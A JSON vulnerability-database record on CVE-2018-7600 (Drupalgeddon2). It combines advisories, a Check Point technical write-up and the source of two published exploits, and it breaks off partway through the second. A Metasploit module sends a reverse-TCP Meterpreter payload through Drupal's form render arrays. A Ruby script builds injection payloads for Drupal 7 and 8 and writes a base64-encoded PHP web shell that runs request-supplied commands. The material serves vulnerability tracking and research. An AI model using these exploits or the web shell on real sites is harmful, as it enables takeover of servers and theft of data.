"title": "CVE-2018-7600", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T07:29:00", "id": "DEBIANCVE:CVE-2018-7600", "href": "https://security-tracker.debian.org/tracker/CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-08T07:10:20", "description": "Two weeks ago, a highly critical (21/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed an unauthenticated attacker to perform remote code execution on default or common Drupal installations.\r\n\r\nDrupal is an open-source content management system (CMS) that is used by more than one million sites around the world (including governments, e-retail, enterprise organizations, financial institutions and more), all of which are vulnerable unless patched.\r\n\r\nUntil now details of the vulnerability were not available to the public, however, Check Point Research can now expand upon this vulnerability and reveal exactly how it works.\r\n\r\nIn brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.\r\n\r\nThe vulnerability existed on all Drupal versions from 6 to 8, though has since been patched to those who manually update their site. In this document we will showcase real life attack scenarios around an out-of-the-box installation of Drupal\u2019s flagship product, Drupal 8.\r\n\r\n### Technical Details\r\n\r\n#### The Vulnerability\r\n\r\nTo provide some background, Drupal\u2019s Form API was introduced in Drupal 6 and allowed alteration of the form data during the form rendering process. This revolutionized the way markup processing was done.\r\n\r\nIn Drupal 7 the Form API was generalized to what is now known as \u201cRenderable Arrays\u201d. This extended API is used to represent the structure of most of the UI elements in Drupal, such as pages, blocks, nodes and more.\r\n\r\nRenderable arrays contain metadata that is used in the rendering process. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). Please see below for an example:\r\n```\r\n[\r\n\u2018#type\u2019 => \u2018markup\u2019,\r\n\u2018#markup\u2019 => \u2018<em>some text</em>\u2019,\r\n\u2018#prefix\u2019 => \u2018<div>\u2019,\r\n\u2018#suffix\u2019 => \u2018</div>\u2019\r\n]\r\n```\r\n\r\n#### Drupal\u2019s Patch\r\n\r\nThe patch that Drupal published adds a single class called RequestSanitizer with a stripDangerousValues method that unsets all the items in an input array for keys that start with a hash sign. This method sanitizes input data in `$_GET`, `$_POST` & `$_COOKIES` during the very early stages of Drupal\u2019s bootstrap (immediately after loading the site configurations).\r\n\r\nWe assume that one of the reasons that the patch was done in this way was to make it harder to find and exploit the vulnerability.\r\n\r\n#### Finding an Attack Vector\r\n\r\nBecause of the above we focused on forms that are exposed to anonymous users.\r\n\r\nThere are a few of those forms available, one of which is the user registration form. This form contains multiple fields, as can be seen in the screenshot below.\r\n\r\n\r\n\r\nFigure 1: The Drupal registration form.\r\n\r\nWe knew that we needed to inject a renderable array somewhere in the form structure, we just had to find out where.\r\n\r\nAs it happens, the \u201cEmail address\u201d field does not sanitize the type of input that it receives. This allowed us to inject an array to the form array structure (as the value of the email field).\r\n\r\n\r\n\r\nFigure 2: Injecting our renderable array into the mail input of the registration form.\r\n\r\n\r\n\r\nFigure 3: Example of injected form renderable array.\r\n\r\nNow all we needed was for Drupal to render our injected array. Since Drupal treats our injected array as a value and not as an element, we needed to trick Drupal into rendering it.\r\n\r\nThe situations in which Drupal renders arrays are as follows:\r\n\r\n1. Page load\r\n2. Drupal AJAX API \u2013 i.e. when a user fills an AJAX form, a request is made to Drupal which renders an HTML markup and updates the form.\r\n\r\n\r\nAfter investigating possible attack vectors surrounding the above functionalities, because of the post-submission rendering process and the way Drupal implements it, we came to the conclusion that an AJAX API call is our best option to leverage an attack.\r\n\r\nAs part of the user registration form, the \u201cPicture\u201d field uses Drupal\u2019s AJAX API to upload a picture into the server and replace it with a thumbnail of the uploaded image.\r\n\r\n\r\n\r\nFigure 4: Form used to upload a picture using AJAX API.\r\n\r\nDiving into the AJAX file upload callback revealed that it uses a GET parameter to locate the part of the form that needs to be updated in the client.\r\n\r\n\r\n\r\nFigure 5: The AJAX \u2018upload file\u2019 callback function code.\r\n\r\nAfter pointing element_parents to the part of the form that contained our injected array, Drupal successfully rendered it.\r\n\r\n#### Weaponizing Drupalgeddon 2\r\n\r\nNow, all we had to do is to inject a malicious render array that uses one of Drupal\u2019s rendering callback to execute code on the system.\r\n\r\nThere were several properties we could have injected:\r\n\r\n* #access_callback\r\n\t* Used by Drupal to determine whether or not the current user has access to an element.\r\n* #pre_render\r\n\t* Manipulates the render array before rendering.\r\n* #lazy_builder\r\n\t* Used to add elements in the very end of the rendering process.\r\n* #post_render\r\n\t* Receives the result of the rendering process and adds wrappers around it.\r\n\t\r\n\t\r\nFor our POC to work, we chose the #lazy_builder element as the one being injected into the mail array. Combined with the AJAX API callback functionality, we could direct Drupal to render our malicious array.\r\n\r\nThis allowed us to take control over the administrator\u2019s account, install a malicious backdoor module and finally execute arbitrary commands on the server.\r\n\r\n\r\n\r\nFigure 6: injecting malicious command into one of Drupal\u2019s rendering callbacks.\r\n\r\n\r\n\r\nFigure 7: Successfully executing shell commands using the malicious module.\r\n\r\n### Conclusion\r\n\r\nAfter seeing earlier publications on Twitter and several security blogs, it was apparent that there was much confusion among the community regarding this vulnerability announcement, with some even doubting the severity of it. As a result, we considered it worthwhile to looking deeper into.\r\n\r\nThe research however was challenging as we were starting from a very large attack surface since the patch blurred the real attack vectors. To expedite our findings, we were fortunate to be joined by experts in the Drupal platform. The final results highlight how easy it is for organization to be exposed through no fault of their own, but rather through the third party platforms they use every day.", "cvss3": {}, "published": "2018-03-30T00:00:00", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7600)\n (Drupalgeddon2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-30T00:00:00", "id": "SSV:97207", "href": "https://www.seebug.org/vuldb/ssvid-97207", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nDrupal Security Team reports:\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6,\n\t and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because\n\t of an issue affecting multiple subsystems with default or common module configurations.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "freebsd", "title": "drupal -- Drupal Core - Multiple Vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-13T00:00:00", "id": "A9E466E8-4144-11E8-A292-00E04C1EA73D", "href": "https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-12-10T23:13:22", "description": "This exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:50pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**busterb** at May 09, 2019 5:57pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**hrbrmstr** at May 12, 2020 7:54pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "attackerkb", "title": "Drupalgeddon 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2020-09-02T00:00:00", "id": "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "href": "https://attackerkb.com/topics/0gCgI4g4Z2/drupalgeddon-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T08:14:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-17T00:00:00", "type": "exploitdb", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-7600", "CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "EDB-ID:44482", "href": "https://www.exploit-db.com/exploits/44482", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n\r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n\r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n\r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n\r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n\r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end", "sourceHref": "https://www.exploit-db.com/download/44482", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T08:14:45", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-7600", "CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EDB-ID:44449", "href": "https://www.exploit-db.com/exploits/44449", "sourceData": "#!/usr/bin/env ruby\r\n#\r\n# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\r\n#\r\n# Authors:\r\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\r\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\r\n#\r\n\r\n\r\nrequire 'base64'\r\nrequire 'json'\r\nrequire 'net/http'\r\nrequire 'openssl'\r\nrequire 'readline'\r\nrequire 'highline/import'\r\n\r\n\r\n# Settings - Try to write a PHP to the web root?\r\ntry_phpshell = true\r\n# Settings - General/Stealth\r\n$useragent = \"drupalgeddon2\"\r\nwebshell = \"shell.php\"\r\n# Settings - Proxy information (nil to disable)\r\n$proxy_addr = nil\r\n$proxy_port = 8080\r\n\r\n\r\n# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)\r\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\r\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Function http_request <url> [type] [data]\r\ndef http_request(url, type=\"get\", payload=\"\", cookie=\"\")\r\n puts verbose(\"HTTP - URL : #{url}\") if $verbose\r\n puts verbose(\"HTTP - Type: #{type}\") if $verbose\r\n puts verbose(\"HTTP - Data: #{payload}\") if not payload.empty? and $verbose\r\n\r\n begin\r\n uri = URI(url)\r\n request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\r\n request.initialize_http_header({\"User-Agent\" => $useragent})\r\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\r\n request.body = payload if not payload.empty?\r\n return $http.request(request)\r\n rescue SocketError\r\n puts error(\"Network connectivity issue\")\r\n rescue Errno::ECONNREFUSED => e\r\n puts error(\"The target is down ~ #{e.message}\")\r\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\r\n rescue Timeout::Error => e\r\n puts error(\"The target timed out ~ #{e.message}\")\r\n end\r\n\r\n # If we got here, something went wrong.\r\n exit\r\nend\r\n\r\n\r\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\r\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\r\n puts info(\"Payload: #{evil}\") if not shell\r\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? and $verbose\r\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\r\n\r\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\r\n # Check the version to match the payload\r\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\r\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\r\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\r\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\r\n\r\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\r\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\r\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\r\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + \"&timezone[a][#lazy_builder][][]=\" + evil\r\n\r\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\r\n\r\n elsif $drupalverion.start_with?(\"7\") and element == \"name\"\r\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\r\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\r\n payload = \"form_id=user_pass&_triggering_element_name=name\"\r\n end\r\n\r\n # Drupal v7.x needs an extra value from a form\r\n if $drupalverion.start_with?(\"7\")\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n\r\n form_name = \"form_build_id\"\r\n puts verbose(\"Form name : #{form_name}\") if $verbose\r\n\r\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\r\n puts warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\r\n puts verbose(\"Form value : #{form_value}\") if $verbose\r\n\r\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\r\n payload = \"#{form_name}=#{form_value}\"\r\n end\r\n\r\n return url, payload\r\nend\r\n\r\n\r\n# Function clean_result <input>\r\ndef clean_result(input)\r\n #result = JSON.pretty_generate(JSON[response.body])\r\n #result = $drupalverion.start_with?(\"8\")? JSON.parse(clean)[0][\"data\"] : clean\r\n clean = input.to_s.strip\r\n\r\n # PHP function: passthru\r\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\r\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\r\n\r\n # PHP function: exec\r\n # For: [{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"<payload>\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\r\n #clean.slice!(/\\[{\"command\":\".*data\":\"/)\r\n #clean.slice!(/\\\\u003Cspan class=\\\\u0022.*}\\]$/)\r\n\r\n # Newer PHP for an older Drupal\r\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\r\n #clean.slice!(/<b>.*<br \\/>/)\r\n\r\n # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500\r\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\r\n clean.slice!(/The website encountered an unexpected error.*/)\r\n\r\n return clean\r\nend\r\n\r\n\r\n# Feedback when something goes right\r\ndef success(text)\r\n # Green\r\n return \"\\e[#{32}m[+]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback when something goes wrong\r\ndef error(text)\r\n # Red\r\n return \"\\e[#{31}m[-]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback when something may have issues\r\ndef warning(text)\r\n # Yellow\r\n return \"\\e[#{33}m[!]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback when something doing something\r\ndef action(text)\r\n # Blue\r\n return \"\\e[#{34}m[*]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback with helpful information\r\ndef info(text)\r\n # Light blue\r\n return \"\\e[#{94}m[i]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback for the overkill\r\ndef verbose(text)\r\n # Dark grey\r\n return \"\\e[#{90}m[v]\\e[0m #{text}\"\r\nend\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\ndef init_authentication()\r\n $uname = ask('Enter your username: ') { |q| q.echo = false }\r\n $passwd = ask('Enter your password: ') { |q| q.echo = false }\r\n $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true }\r\n $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true }\r\n $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true }\r\n $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true }\r\nend\r\n\r\ndef is_arg(args, param)\r\n args.each do |arg|\r\n if arg == param\r\n return true\r\n end\r\n end\r\n return false\r\nend\r\n\r\n\r\n# Quick how to use\r\ndef usage()\r\n puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'\r\n puts 'Example for target that does not require authentication:'\r\n puts ' ruby drupalgeddon2.rb https://example.com'\r\n puts 'Example for target that does require authentication:'\r\n puts ' ruby drupalgeddon2.rb https://example.com --authentication'\r\nend\r\n\r\n\r\n# Read in values\r\nif ARGV.empty?\r\n usage()\r\n exit\r\nend\r\n\r\n$target = ARGV[0]\r\ninit_authentication() if is_arg(ARGV, '--authentication')\r\n$verbose = is_arg(ARGV, '--verbose')\r\n\r\n\r\n# Check input for protocol\r\n$target = \"http://#{$target}\" if not $target.start_with?(\"http\")\r\n# Check input for the end\r\n$target += \"/\" if not $target.end_with?(\"/\")\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Banner\r\nputs action(\"--==[::#Drupalggedon2::]==--\")\r\nputs \"-\"*80\r\nputs info(\"Target : #{$target}\")\r\nputs info(\"Proxy : #{$proxy_addr}:#{$proxy_port}\") if $proxy_addr\r\nputs info(\"Write? : Skipping writing PHP web shell\") if not try_phpshell\r\nputs \"-\"*80\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Setup connection\r\nuri = URI($target)\r\n$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)\r\n\r\n# Use SSL/TLS if needed\r\nif uri.scheme == \"https\"\r\n $http.use_ssl = true\r\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\nend\r\n\r\n$session_cookie = ''\r\n# If authentication required then login and get session cookie\r\nif $uname\r\n $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix\r\n response = http_request($target + $login_path, 'post', $payload, $session_cookie)\r\n if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']\r\n $session_cookie = response['set-cookie'].split('; ')[0]\r\n puts success(\"Logged in - Session Cookie : #{$session_cookie}\")\r\n end\r\n\r\nend\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Try and get version\r\n$drupalverion = \"\"\r\n\r\n# Possible URLs\r\nurl = [\r\n # --- changelog ---\r\n # Drupal v6.x / v7.x [200]\r\n $target + \"CHANGELOG.txt\",\r\n # Drupal v8.x [200]\r\n $target + \"core/CHANGELOG.txt\",\r\n\r\n # --- bootstrap ---\r\n # Drupal v7.x / v6.x [403]\r\n $target + \"includes/bootstrap.inc\",\r\n # Drupal v8.x [403]\r\n $target + \"core/includes/bootstrap.inc\",\r\n\r\n # --- database ---\r\n # Drupal v7.x / v6.x [403]\r\n $target + \"includes/database.inc\",\r\n # Drupal v7.x [403]\r\n #$target + \"includes/database/database.inc\",\r\n # Drupal v8.x [403]\r\n #$target + \"core/includes/database.inc\",\r\n\r\n # --- landing page ---\r\n # Drupal v8.x / v7.x [200]\r\n $target,\r\n]\r\n\r\n# Check all\r\nurl.each do|uri|\r\n # Check response\r\n response = http_request(uri, 'get', '', $session_cookie)\r\n\r\n # Check header\r\n if response['X-Generator'] and $drupalverion.empty?\r\n header = response['X-Generator'].slice(/Drupal (.*) \\(https:\\/\\/www.drupal.org\\)/, 1).to_s.strip\r\n\r\n if not header.empty?\r\n $drupalverion = \"#{header}.x\" if $drupalverion.empty?\r\n puts success(\"Header : v#{header} [X-Generator]\")\r\n puts verbose(\"X-Generator: #{response['X-Generator']}\") if $verbose\r\n end\r\n end\r\n\r\n # Check request response, valid\r\n if response.code == \"200\"\r\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\r\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\r\n\r\n # Check to see if it says: The requested URL \"http://<URL>\" was not found on this server.\r\n puts warning(\"WARNING: Could be a false-positive [1-1], as the file could be reported to be missing\") if response.body.downcase.include? \"was not found on this server\"\r\n\r\n # Check to see if it says: <h1 class=\"js-quickedit-page-title title page-title\">Page not found</h1> <div class=\"content\">The requested page could not be found.</div>\r\n puts warning(\"WARNING: Could be a false-positive [1-2], as the file could be reported to be missing\") if response.body.downcase.include? \"the requested page could not be found\"\r\n\r\n # Only works for CHANGELOG.txt\r\n if uri.match(/CHANGELOG.txt/)\r\n # Check if valid. Source ~ 